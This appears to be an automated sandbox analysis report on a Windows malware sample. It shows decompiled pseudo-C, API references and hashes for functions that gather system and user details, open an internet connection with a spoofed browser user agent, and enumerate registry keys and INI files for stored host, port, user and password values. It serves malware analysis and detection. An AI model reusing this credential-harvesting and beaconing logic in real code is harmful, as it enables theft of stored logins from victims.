0x00414c49
0x00414c4b
0x00000000
0x00000000
0x00000000
0x00414c4b
0x00414c25
0x00414c2a
0x00414c2c
0x00000000
0x00000000
0x00000000
0x00414c2c
0x00000000
0x00414b98
0x00000000

Strings

$UA, xrefs: 00414DE6

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: $UA
API String ID: 0-101904185
Opcode ID: 7159c469049adc8925688a5d226e71439506754fa10b86ebf483b6321c7ebb9a
Instruction ID: 171a7e8214387cec5d7214fbebf54cdbf022115b044a305d373e3600447fccf8
Opcode Fuzzy Hash: 7159c469049adc8925688a5d226e71439506754fa10b86ebf483b6321c7ebb9a
Instruction Fuzzy Hash: DCB1B071900709AADF20EFA5C881BFEB7B4BF44304F50452AF956A6691E738E9C1CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040897C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040897C(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t114 =  *_t111;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E00411AA3(_t114);
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if((_a8 & 0x00000001) == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x4000001;
						_t99 = E00411AB7(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E0040C1C2( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E004088C8(_t106, _t111, 2);
									E004088C8(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 != 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E00411B64(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_t64 =  &_v588;
								__imp__GetUserNameExW(2, _t64,  &_a4);
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E00411B64(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E004173DB(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E00411AB7(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E00411AB7(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E0040C2C4();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E00411AB7(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E0040C2EC();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E00411AB7(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E00411AB7(_t111, _t104);
					goto L16;
				}
				_t92 = E00413447(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E00411B64(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E004135A7( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E00411B64(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

0x0040897c
0x0040897c
0x00408987
0x0040898a
0x0040898e
0x00408990
0x00408994
0x00408996
0x0040899b
0x0040899f
0x00000000
0x004089a1
0x004089a8
0x004089a8
0x004089ac
0x004089b5
0x004089fe
0x004089fe
0x00408a02
0x00408a07
0x00408a08
0x00408a09
0x00408a10
0x00408a13
0x00408a1f
0x00408a1f
0x00408a21
0x00408a21
0x00408a25
0x00408a9a
0x00408a9a
0x00408a9c
0x00408b9f
0x00408b9f
0x00408ba3
0x00408ba7
0x00408bac
0x00408bac
0x00408bac
0x00408baf
0x00000000
0x00408baf
0x00408aa2
0x00408aa6
0x00408af4
0x00408af4
0x00408af6
0x00000000
0x00000000
0x00408afc
0x00408b00
0x00408b80
0x00408b80
0x00408b82
0x00000000
0x00000000
0x00408b84
0x00408b88
0x00408b8d
0x00408b95
0x00408b95
0x00000000
0x00408b88
0x00408b10
0x00408b16
0x00408b19
0x00408b1b
0x00408b1d
0x00408b24
0x00408b2d
0x00408b38
0x00408b38
0x00408b3a
0x00408b41
0x00408b43
0x00000000
0x00408b45
0x00408b49
0x00408b52
0x00408b58
0x00408b5a
0x00408b5c
0x00408b5f
0x00408b61
0x00408b63
0x00408b6a
0x00408b73
0x00408b7e
0x00408b7e
0x00408b61
0x00000000
0x00408b5a
0x00408b43
0x00408aa8
0x00408aab
0x00408ab2
0x00408ab6
0x00408ab7
0x00408abe
0x00408abf
0x00408ac4
0x00408ac6
0x00408ac8
0x00408b9c
0x00000000
0x00408b9c
0x00408ace
0x00408ad7
0x00408add
0x00408ae1
0x00408ae2
0x00408ae9
0x00408aea
0x00408aef
0x00408af2
0x00000000
0x00408af2
0x00408a27
0x00408a29
0x00000000
0x00000000
0x00408a34
0x00408a3a
0x00408a3b
0x00408a3c
0x00408a43
0x00408a4b
0x00408a4d
0x00408a4f
0x00000000
0x00000000
0x00408a5a
0x00408a60
0x00408a61
0x00408a62
0x00408a69
0x00408a71
0x00408a73
0x00408a75
0x00000000
0x00000000
0x00408a81
0x00408a87
0x00408a88
0x00408a89
0x00408a90
0x00408a98
0x00000000
0x00408a98
0x004089be
0x004089c9
0x004089d4
0x004089d6
0x004089d8
0x00000000
0x00000000
0x004089de
0x004089e3
0x004089e8
0x004089f0
0x004089f8
0x004089f8
0x004089fa
0x004089fc
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00408A7B
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,?,00000000), ref: 00408ACE
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,?,00000000), ref: 00408B10
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00408B52

Strings

, xrefs: 00408B84

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-3916222277
Opcode ID: 616597641f083a28978e273412f3d7216c978760fb7b0a911202f5318b7a9a01
Instruction ID: 4df86ae7a39a0350f3a69106ff32d793e36c4f645c6b66347e248ba3f5ff140c
Opcode Fuzzy Hash: 616597641f083a28978e273412f3d7216c978760fb7b0a911202f5318b7a9a01
Instruction Fuzzy Hash: 9B51E77164124879DB10AB95D945FEE3BA89F11344F08406FFA84BB3D2DF7C9984CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041745A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041745A(void* _a4, WCHAR* _a8) {
				char _v40;
				char _v160;
				char _v680;
				void* __edi;
				void* __esi;
				void** _t11;
				void* _t13;
				void* _t16;
				void* _t18;
				void* _t23;
				void* _t28;
				void* _t30;
				WCHAR* _t34;

				_t11 =  &_a4;
				_t28 = 0;
				__imp__ConvertSidToStringSidW(_a4, _t11);
				if(_t11 != 0) {
					_t37 =  &_v160;
					_t13 = 4;
					E004128DB(_t13,  &_v160);
					_push(_a4);
					_t34 =  &_v680;
					_t16 = E0040CEB5(_t37, 0x104, _t34, _t37);
					_pop(_t30);
					if(_t16 > 0) {
						_t18 = 5;
						E004128DB(_t18,  &_v40);
						_t23 = E004102E6(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
						if(_t23 != 0 && _t23 != 0xffffffff) {
							PathUnquoteSpacesW(_t34);
							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
							asm("sbb bl, bl");
							_t28 = 1;
						}
					}
					LocalFree(_a4);
				}
				return _t28;
			}

0x00417464
0x0041746b
0x0041746d
0x00417475
0x0041747f
0x00417485
0x00417486
0x0041748b
0x00417496
0x0041749c
0x004174a2
0x004174a5
0x004174ac
0x004174ad
0x004174c4
0x004174cb
0x004174d5
0x004174e2
0x004174ee
0x004174f0
0x004174f0
0x004174cb
0x004174f5
0x004174fc
0x00417501

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0041746D
LocalFree.KERNEL32(?,.exe,00000000), ref: 004174F5

Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB

PathUnquoteSpacesW.SHLWAPI(?,?,?,00000104,.exe,00000000), ref: 004174D5
ExpandEnvironmentStringsW.KERNEL32(?,0040BA17,00000104), ref: 004174E2

Strings

.exe, xrefs: 0041747C

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: ConvertEnvironmentExpandFreeLocalOpenPathSpacesStringStringsUnquote
String ID: .exe
API String ID: 2200435814-4119554291
Opcode ID: a2196abe7a033ce2cd8f11988add9b9afefcccc77b9928495a52f5d599c16523
Instruction ID: c81c50b1731865f3a9f735791d695ec6ee8297fc3319b9a7c3c80ee406b0a384
Opcode Fuzzy Hash: a2196abe7a033ce2cd8f11988add9b9afefcccc77b9928495a52f5d599c16523
Instruction Fuzzy Hash: 7A11C671644118ABDB106B7ADD09ECF3BACDF49360F004526F945F71A0D674D989CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040DD96, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DD96(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x422394; // 0x422394
					_t2 = _t18 + 0x422390; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x0040dd96
0x0040dd96
0x0040dd9c
0x0040dd9e
0x0040dd9e
0x0040ddb3
0x0040ddb7
0x0040ddfb
0x00000000
0x0040ddfb
0x0040ddba
0x0040ddbc
0x0040ddbe
0x0040ddc5
0x0040ddcc
0x0040ddd2
0x0040ddd5
0x0040dde9
0x0040ddf2
0x0040ddf5
0x00000000
0x0040ddf5
0x0040ddff

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040DDAD
InternetSetOptionA.WININET(00000000,00000002,00422394,00000004), ref: 0040DDCC
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DDE9
InternetCloseHandle.WININET(00000000), ref: 0040DDF5

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 0040DD9E, 0040DDAC

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: 57d2b6ebd90236b1621037a5e3fc0953de7ec09f38e0969a796a7df0e70bb1fa
Instruction ID: 31c2abd5257d5eb995361a56b090b3dec1bd7c8b1db8aafd1295f5d5d417efbd
Opcode Fuzzy Hash: 57d2b6ebd90236b1621037a5e3fc0953de7ec09f38e0969a796a7df0e70bb1fa
Instruction Fuzzy Hash: 42F0F6726002107BD62257B18D8CD6B6D6EEFCA720704043DF646F1061C63988109778

Uniqueness

Uniqueness Score: -1.00%

Function 0040E20A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040E20A() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E0040C620( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x0040e219
0x0040e21b
0x0040e221
0x0040e226
0x0040e22e
0x0040e236
0x0040e23c
0x0040e243
0x0040e249
0x0040e24a
0x0040e24d
0x0040e257
0x0040e25c
0x0040e25e
0x0040e25e
0x0040e264
0x0040e27a
0x0040e27a
0x0040e27c
0x0040e280
0x0040e280
0x0040e28a

APIs

LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040E21B
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040E22E
FreeLibrary.KERNEL32(?), ref: 0040E280

Strings

urlmon.dll, xrefs: 0040E214
ObtainUserAgentString, xrefs: 0040E228

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: b22fa959e8f82f87aef1e1f4010b1c80639566e36f40f1fa4f2caf69ca530a90
Instruction ID: ad4c1c7f4a524baa0e123af2c37521bdaca79dad59a0c43f22bf94fc19087e8e
Opcode Fuzzy Hash: b22fa959e8f82f87aef1e1f4010b1c80639566e36f40f1fa4f2caf69ca530a90
Instruction Fuzzy Hash: A8018471D01218ABCB10ABF99D849DE7ABCAF04340F2006FEB655F3290D6349E448A68

Uniqueness

Uniqueness Score: -1.00%

Function 004195ED, Relevance: 7.7, APIs: 5, Instructions: 202
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E004195ED(char* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				signed int _v16;
				char* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				char _v60;
				char _v80;
				char _v100;
				char _v120;
				char _v152;
				char _v216;
				char _v284;
				short _v804;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				int _t102;
				int _t110;
				int _t114;
				void* _t115;
				signed int _t117;
				void* _t119;
				intOrPtr _t121;
				void* _t124;
				intOrPtr _t127;
				int _t134;
				intOrPtr _t136;
				char* _t138;
				char* _t141;
				signed int _t145;
				void* _t146;
				void* _t147;

				_t129 = __ecx;
				_t70 = E0040C192(0xc08);
				_t127 = _t70;
				_t134 = 0;
				_v24 = _t127;
				if(_t127 == 0) {
					return _t70;
				} else {
					E004128DB(0x83,  &_v216);
					_t141 =  &_v284;
					E004128DB(0x84, _t141);
					_v48 =  &_v216;
					_v44 = _t141;
					E0040C275( &_v36,  &_v36, 0, 8);
					E004128DB(0x85,  &_v120);
					E004128DB(0x86,  &_v100);
					E004128DB(0x87,  &_v60);
					_t145 =  &_v80;
					E004128DB(0x88, _t145);
					_t12 = _t127 + 0x3fc; // 0x3fc
					_v20 = _t12;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
							goto L22;
						}
						_v28 = _t134;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t136 = _v24;
							_v28 = _v28 + 1;
							_t102 = E004102E6(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
							_t145 = _t145 | 0xffffffff;
							_v8 = _t102;
							if(_t102 != _t145 && _t102 != 0) {
								_t137 = _t136 + 0x1fe;
								_t110 = E004102E6(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
								_v8 = _t110;
								if(_t110 == _t145 || _t110 == 0) {
									_t114 = E004102E6(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
									_v8 = _t114;
									if(_t114 == _t145 || _t114 == 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t115 = _v12;
									_t129 =  &_v804;
									_v40 = _t115;
									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
										_t117 = _t145;
									} else {
										_t145 =  &_v40;
										_t117 = E0041040E(_t145,  &_v80, _t116, _v20, 0xff);
									}
									_v8 = _t117;
									if(_t117 != 0xffffffff && _t117 != 0) {
										_t138 = _v20;
										if(E00419593(_t138) > 0) {
											_t145 =  &_v152;
											_t119 = 0x56;
											E004128DB(_t119, _t145);
											_t121 = _v24;
											_push(_t121);
											_t129 = _t138;
											_push(_t129);
											_push(_t121 + 0x1fe);
											_t51 = _t129 + 0x1fe; // 0x1fe
											_t124 = E0040CEB5(_t145, 0x307, _t51, _t145);
											_t147 = _t147 + 0x10;
											if(_t124 > 0) {
												_t129 =  &_v36;
												if(E0040C5B6(_t124,  &_v36, _v20 + 0x1fe) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
						} while (RegEnumKeyExW(_v12, _v28,  &_v804,  &_v8, 0, 0, 0, 0) == 0);
						_t134 = 0;
						goto L21;
						L22:
						_v16 = _v16 + 1;
					} while (_v16 < 2);
					E0040C1C2(_v24);
					if(_v32 <= _t134) {
						return E0040C1C2(_v36);
					}
					return E00417504(0x307, _v36, 0xcb);
				}
			}

0x004195ed
0x004195fe
0x00419603
0x00419605
0x00419607
0x0041960c
0x00419865
0x00419612
0x0041961d
0x00419622
0x0041962d
0x00419638
0x0041963f
0x00419647
0x00419654
0x00419661
0x0041966e
0x00419673
0x0041967b
0x00419680
0x00419686
0x00419689
0x00419691
0x004196ac
0x00000000
0x00000000
0x004196c5
0x004196c8
0x004196d7
0x00419822
0x00419825
0x00000000
0x00000000
0x00000000
0x00000000
0x004196dd
0x004196dd
0x004196dd
0x004196e0
0x004196f2
0x004196f7
0x004196fa
0x004196ff
0x0041971c
0x00419722
0x00419727
0x0041972c
0x00419741
0x00419746
0x0041974b
0x00000000
0x00000000
0x00000000
0x00000000
0x00419759
0x00419759
0x00419759
0x00419764
0x0041976c
0x00419777
0x0041978c
0x00419779
0x0041977d
0x00419785
0x00419785
0x0041978e
0x00419794
0x0041979a
0x004197a4
0x004197a8
0x004197ae
0x004197af
0x004197b4
0x004197b7
0x004197b8
0x004197ba
0x004197c0
0x004197c9
0x004197cf
0x004197d4
0x004197d9
0x004197e5
0x004197ef
0x004197f1
0x004197f1
0x004197ef
0x004197d9
0x004197a4
0x00000000
0x00419794
0x0041972c
0x004197f4
0x00419808
0x00419818
0x00419820
0x00000000
0x0041982b
0x0041982b
0x0041982e
0x0041983b
0x00419843
0x00000000
0x0041985c
0x00000000
0x00419852

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004196A4
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 004196CF
RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 00419825

Part of subcall function 004102E6: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,004174C9,?,?,00000104,.exe,00000000), ref: 004102FB

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00419812

Part of subcall function 004102E6: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,004174C9,?,?,00000104), ref: 0041037C

RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF,?,00000000), ref: 0041976F

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Open$Enum$CloseEnvironmentExpandStrings
String ID:
API String ID: 2343474859-0
Opcode ID: e5c4004505b3aaeb9bc7040d0bc67b350e13b74c07a7cf53cce58b0c1c98bbd7
Instruction ID: 9ad1833f4a10a3c47b687c9ae7e47e5301de210e04768025638eface8966ead4
Opcode Fuzzy Hash: e5c4004505b3aaeb9bc7040d0bc67b350e13b74c07a7cf53cce58b0c1c98bbd7
Instruction Fuzzy Hash: 89712771A00119EBEB10EFE5CD85AEFB7BCEF48304F14416AE515F3291E6389E858B64

Uniqueness

Uniqueness Score: -1.00%

Function 004186B3, Relevance: 7.7, APIs: 5, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004186B3(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				char _v564;
				short _v576;
				short _v588;
				short _v600;
				short _v608;
				WCHAR* _v612;
				WCHAR* _v616;
				WCHAR* _v620;
				WCHAR* _v624;
				WCHAR* _v628;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t51;
				WCHAR* _t54;
				WCHAR* _t56;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t63;
				long _t67;
				WCHAR* _t69;
				long _t77;
				long _t80;
				WCHAR* _t82;
				void* _t83;
				WCHAR* _t86;
				WCHAR* _t87;
				short* _t92;
				WCHAR* _t93;
				int _t102;
				WCHAR* _t107;
				intOrPtr _t114;
				signed int _t115;
				void* _t117;

				_t117 = (_t115 & 0xfffffff8) - 0x26c;
				if(E00411A47( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L19:
					return 1;
				}
				_t120 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t107 = E0040C192(0x1fffe);
					_v612 = _t107;
					__eflags = _t107;
					if(_t107 == 0) {
						goto L19;
					}
					_t51 = GetPrivateProfileStringW(0, 0, 0, _t107, 0xffff,  &_v524);
					__eflags = _t51;
					if(_t51 == 0) {
						L18:
						E0040C1C2(_t107);
						goto L19;
					}
					_t9 =  &(_t51[0]); // 0x1
					_t54 = E0040D072(_t107, _t9);
					__eflags = _t54;
					if(_t54 == 0) {
						goto L18;
					}
					_t56 = E0040C192(0xc1c);
					_v620 = _t56;
					__eflags = _t56;
					if(_t56 != 0) {
						_t11 =  &(_t56[0xff]); // 0x1fe
						_t92 = _t11;
						_v624 = _t107;
						_v616 = _t92;
						_t57 = 0x5c;
						_t93 =  &(_t92[0xff]);
						__eflags = _t93;
						E004128DB(_t57,  &_v608);
						_t59 = 0x5d;
						E004128DB(_t59,  &_v588);
						_t61 = 0x5e;
						E004128DB(_t61,  &_v576);
						_t63 = 0x5f;
						E004128DB(_t63,  &_v600);
						do {
							_t67 = GetPrivateProfileStringW(_v624,  &_v608, 0, _v620, 0xff,  &_v524);
							__eflags = _t67;
							if(_t67 != 0) {
								_t102 = GetPrivateProfileIntW(_v624,  &_v588, 0x15,  &_v524);
								_t25 = _t102 - 1; // -1
								__eflags = _t25 - 0xfffe;
								if(_t25 <= 0xfffe) {
									_t77 = GetPrivateProfileStringW(_v624,  &_v576, 0, _v616, 0xff,  &_v524);
									__eflags = _t77;
									if(_t77 != 0) {
										_t80 = GetPrivateProfileStringW(_v624,  &_v600, 0, _t93, 0xff,  &_v524);
										__eflags = _t80;
										if(_t80 != 0) {
											_t82 = E004185A6(_v624, _t93);
											__eflags = _t82;
											if(_t82 > 0) {
												_t113 =  &_v564;
												_t83 = 0x55;
												E004128DB(_t83,  &_v564);
												_push(_t102);
												_push(_v620);
												_push(_t93);
												_push(_v616);
												_t37 =  &(_t93[0xff]); // 0x1fe
												_t103 = _t37;
												_t86 = E0040CEB5(_t113, 0x311, _t37, _t113);
												_t117 = _t117 + 0x14;
												__eflags = _t86;
												if(_t86 > 0) {
													_t114 = _a4;
													_t87 = E0040C5B6(_t86, _t114, _t103);
													__eflags = _t87;
													if(_t87 != 0) {
														_t39 = _t114 + 4;
														 *_t39 =  &(( *(_t114 + 4))[0]);
														__eflags =  *_t39;
													}
												}
											}
										}
									}
								}
							}
							_t69 = E0040D0AE(_v624, 1);
							_v628 = _t69;
							__eflags = _t69;
						} while (_t69 != 0);
						E0040C1C2(_v620);
						_t107 = _v616;
					}
					goto L18;
				} else {
					E00418659(_t120,  &_v524, _a4);
					goto L19;
				}
			}

0x004186b9
0x004186d4
0x00418896
0x0041889e
0x0041889e
0x004186da
0x004186dd
0x004186fb
0x004186fd
0x00418701
0x00418703
0x00000000
0x00000000
0x0041871a
0x00418720
0x00418722
0x00418890
0x00418891
0x00000000
0x00418891
0x00418728
0x0041872d
0x00418732
0x00418734
0x00000000
0x00000000
0x0041873f
0x00418744
0x00418748
0x0041874a
0x00418750
0x00418750
0x00418758
0x0041875c
0x00418764
0x00418765
0x00418765
0x0041876b
0x00418776
0x00418777
0x00418782
0x00418783
0x0041878e
0x0041878f
0x00418794
0x004187ae
0x004187b4
0x004187b6
0x004187d2
0x004187d4
0x004187d7
0x004187dc
0x004187f7
0x004187fd
0x004187ff
0x00418813
0x00418819
0x0041881b
0x00418821
0x00418826
0x00418828
0x0041882c
0x00418830
0x00418831
0x00418836
0x00418837
0x0041883d
0x0041883e
0x00418848
0x00418848
0x0041884e
0x00418853
0x00418856
0x00418858
0x0041885a
0x00418860
0x00418865
0x00418867
0x00418869
0x00418869
0x00418869
0x00418869
0x00418867
0x00418858
0x00418828
0x0041881b
0x004187ff
0x004187dc
0x00418872
0x00418877
0x0041887b
0x0041887b
0x00418887
0x0041888c
0x0041888c
0x00000000
0x004186df
0x004186e7
0x00000000
0x004186e7

APIs

Part of subcall function 00411A47: PathCombineW.SHLWAPI(00412BBC,00412BBC,?,00412BBC,?,?), ref: 00411A66

GetPrivateProfileStringW.KERNEL32 ref: 0041871A
GetPrivateProfileStringW.KERNEL32 ref: 004187AE
GetPrivateProfileIntW.KERNEL32 ref: 004187CC
GetPrivateProfileStringW.KERNEL32 ref: 004187F7
GetPrivateProfileStringW.KERNEL32 ref: 00418813

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
